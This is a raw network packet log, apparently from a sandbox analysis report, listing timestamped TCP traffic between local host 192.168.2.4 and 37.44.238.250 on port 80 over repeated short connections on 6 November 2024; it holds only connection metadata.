                                                                    Nov 6, 2024 03:37:19.850348949 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850444078 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850454092 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850496054 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850543022 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850583076 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850704908 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850831985 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855041981 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855228901 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855308056 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855333090 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855343103 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855351925 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855360985 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855379105 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855391026 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855398893 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855427027 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855436087 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855443954 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855474949 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855488062 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855583906 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855698109 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855709076 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860295057 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860308886 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860318899 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860369921 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860378981 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860388041 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860399008 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860407114 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860423088 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860430956 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.125818968 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.130830050 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.585585117 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.625627041 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.656322002 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.764262915 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.828795910 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.844352961 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.997206926 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.997271061 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.998034000 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002604008 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.002650976 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002897978 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.002955914 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002991915 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.003082991 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.003155947 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.007883072 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.391925097 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.396786928 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.813747883 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.889919043 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.890007019 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.025568962 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.026222944 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.030729055 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.030793905 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.031135082 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.031215906 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.031343937 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.036087036 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.375691891 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.380615950 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.769545078 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.774364948 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.774444103 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.779226065 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.784066916 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.788645029 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.793847084 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.793895960 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.924765110 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.929611921 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.929680109 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.929759979 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.934500933 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.125720024 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.130563974 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.130614042 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.282084942 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.286870003 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.592039108 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.665405989 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.665457964 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.739573956 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.809732914 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.809886932 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.422997952 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.423062086 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.423708916 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428474903 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.428541899 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428818941 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.428879976 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428978920 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.429198027 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.429246902 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.433779955 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.781956911 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.786818027 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.241245031 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.316793919 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.316843033 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.317692041 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.322926998 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.322971106 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.434403896 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.439630985 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.439696074 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.439796925 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.445058107 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.797646046 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.802963018 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.250081062 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.324264050 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.324497938 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.477652073 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.478738070 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.483464956 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.483525991 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.483944893 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.484038115 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.484267950 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.489156008 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.830780029 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.835731030 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.287305117 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.328741074 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.364610910 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.480503082 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.481355906 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.485656023 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.485707998 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.486140013 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.486211061 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.486308098 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.491035938 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.844511032 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.849415064 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.298870087 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.371457100 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.371520042 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.494915009 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.495728970 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.501365900 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.501847029 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.501900911 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.501926899 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.502032995 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.507982016 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.686996937 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.687108040 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.691878080 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.693464994 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.693620920 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.698385954 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.733664989 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.854473114 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.860970020 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.861680031 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.861772060 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.868571043 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.047674894 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.052542925 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.052719116 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.095794916 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.095860004 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.219716072 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.224575043 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.504090071 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.574538946 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.574629068 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.680751085 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.754108906 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.754168987 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.064847946 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.065035105 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.066140890 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.070477009 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.070521116 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.070950985 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.070997953 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.071017027 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.071063042 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.071151972 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.076019049 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.422591925 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.427700996 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.884957075 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.958198071 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.958264112 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.088269949 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.093158960 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.095335960 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.095452070 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.100366116 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.453897953 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.458772898 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.896694899 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.966439009 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.966511965 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.405463934 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.406223059 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.410763025 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:32.410865068 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.411046028 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:32.411118031 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.411256075 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.416476011 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:32.767188072 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:32.772263050 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.214185953 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.294085026 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.294173002 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.433043957 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.433330059 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.438368082 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.438446999 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.438709974 CET804975937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.438769102 CET4975980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.438777924 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.443546057 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:33.797657013 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:33.802623987 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.248665094 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.328052998 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.328114986 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.479716063 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.480443001 CET4976180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.485241890 CET804976037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.485572100 CET804976137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.485631943 CET4976080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.485670090 CET4976180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.485840082 CET4976180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.490865946 CET804976137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.597891092 CET4976180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.598555088 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.603388071 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.607439995 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.607675076 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.612504005 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.649622917 CET804976137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.954549074 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:34.959582090 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:34.959605932 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.070333004 CET804976137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.070430040 CET4976180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.265413046 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.270277023 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.270344973 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.270493031 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.277107954 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.428045034 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.498843908 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:35.498907089 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.625827074 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:35.631004095 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.097726107 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.156883001 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.167656898 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.293437004 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.293517113 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.294162989 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.298695087 CET804976237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.298769951 CET4976280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.298974037 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.299043894 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.299104929 CET804976337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.299118996 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.299149990 CET4976380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.303988934 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:36.656991959 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:36.661942005 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:37.117599010 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:37.190800905 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:37.190882921 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.145571947 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.146322012 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.151228905 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:38.151251078 CET804976437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:38.151298046 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.151340008 CET4976480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.151451111 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.156202078 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:38.500813007 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:38.505714893 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:38.973120928 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.052670002 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.055334091 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.169661999 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.170300961 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.174930096 CET804976537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.175113916 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.175184965 CET4976580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.175231934 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.175318003 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.180044889 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.531972885 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:39.536940098 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:39.988178968 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.059659004 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.059722900 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.513564110 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.519486904 CET804976637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.519597054 CET4976680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.523751974 CET4976780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.528673887 CET804976737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.528770924 CET4976780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.528902054 CET4976780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.534257889 CET804976737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.867129087 CET4976780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.917685986 CET804976737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.924571037 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.929439068 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:40.929507017 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.929636002 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:40.934628963 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.112498999 CET804976737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.112555981 CET4976780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.282001019 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.286942005 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.738755941 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.816730022 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.816792011 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.940200090 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.940785885 CET4976980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.945422888 CET804976837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.945480108 CET4976880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.945579052 CET804976937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:41.945642948 CET4976980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.945715904 CET4976980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:41.950550079 CET804976937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:42.297751904 CET4976980192.168.2.437.44.238.250
